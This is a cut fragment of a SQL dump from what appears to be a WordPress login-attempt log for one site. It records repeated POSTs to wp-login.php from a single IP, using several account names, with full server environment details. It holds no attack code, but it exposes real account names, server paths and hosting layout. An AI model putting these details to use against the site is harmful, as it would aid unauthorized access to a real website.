T\";d:1746828529.938343;s:12:\"REQUEST_TIME\";i:1746828529;}}','13.201.84.118',1,'2025-05-10 03:38:51','2025-05-11 04:14:48'),(95137,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828529.9536879;s:12:\"REQUEST_TIME\";i:1746828529;}}','13.201.84.118',1,'2025-05-10 03:38:51','2025-05-11 04:14:48'),(95138,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828529.9527431;s:12:\"REQUEST_TIME\";i:1746828529;}}','13.201.84.118',1,'2025-05-10 03:38:51','2025-05-11 04:14:47'),(95139,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"131\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"131\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828529.8990481;s:12:\"REQUEST_TIME\";i:1746828529;}}','13.201.84.118',1,'2025-05-10 03:38:51','2025-05-11 04:14:47'),(95140,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828800.634377;s:12:\"REQUEST_TIME\";i:1746828800;}}','13.201.84.118',1,'2025-05-10 03:43:22','2025-05-11 04:14:47'),(95141,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828800.6371601;s:12:\"REQUEST_TIME\";i:1746828800;}}','13.201.84.118',1,'2025-05-10 03:43:22','2025-05-11 04:14:47'),(95142,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828800.6425841;s:12:\"REQUEST_TIME\";i:1746828800;}}','13.201.84.118',1,'2025-05-10 03:43:22','2025-05-11 04:14:48'),(95143,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828800.6345589;s:12:\"REQUEST_TIME\";i:1746828800;}}','13.201.84.118',1,'2025-05-10 03:43:22','2025-05-11 04:14:48'),(95144,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828802.23154;s:12:\"REQUEST_TIME\";i:1746828802;}}','13.201.84.118',1,'2025-05-10 03:43:23','2025-05-11 04:14:47'),(95145,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829061.2987511;s:12:\"REQUEST_TIME\";i:1746829061;}}','13.201.84.118',1,'2025-05-10 03:47:43','2025-05-11 04:14:47'),(95146,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829061.299439;s:12:\"REQUEST_TIME\";i:1746829061;}}','13.201.84.118',1,'2025-05-10 03:47:43','2025-05-11 04:14:48'),(95147,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_